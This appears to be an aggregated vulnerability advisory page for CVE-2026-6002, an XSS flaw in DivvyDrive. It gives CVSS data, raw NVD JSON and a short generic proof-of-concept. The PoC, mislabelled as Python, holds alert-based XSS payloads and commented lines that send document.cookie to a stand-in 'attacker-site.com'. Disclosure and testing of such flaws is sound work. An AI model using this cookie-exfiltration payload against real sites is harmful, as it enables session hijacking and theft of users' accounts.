Security Vulnerability Report
中文
CVE-2026-6002 CVSS 8.8 HIGH

CVE-2026-6002

Published: 2026-05-07 13:16:14
Last Modified: 2026-05-07 14:42:24

Description

Improper neutralization of Script-Related HTML tags in a web page (basic XSS) vulnerability in DivvyDrive Information Technologies Inc. DivvyDrive allows Cross-Site Scripting (XSS). This issue affects DivvyDrive: from 4.8.2.9 before 4.8.3.2.

CVSS Details

CVSS Score
8.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

DivvyDrive 4.8.2.9 至 4.8.3.2 之前版本

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- Proof of Concept for CVE-2026-6002 --> <!-- Basic XSS payload to test vulnerability --> <script> alert('CVE-2026-6002 XSS Vulnerability Confirmed'); // Attackers could steal cookies like this: // var c = document.cookie; // window.location.href = 'http://attacker-site.com/log?c=' + encodeURIComponent(c); </script> <!-- Alternative payload using image tag --> <img src=x onerror=alert('CVE-2026-6002')>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-6002", "sourceIdentifier": "[email protected]", "published": "2026-05-07T13:16:13.773", "lastModified": "2026-05-07T14:42:24.170", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper neutralization of Script-Related HTML tags in a web page (basic XSS) vulnerability in DivvyDrive Information Technologies Inc. DivvyDrive allows Cross-Site Scripting (XSS).\n\nThis issue affects DivvyDrive: from 4.8.2.9 before 4.8.3.2."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-80"}]}], "references": [{"url": "https://siberguvenlik.gov.tr/guvenlik-bildirimleri/detay/tr-26-0182", "source": "[email protected]"}]}}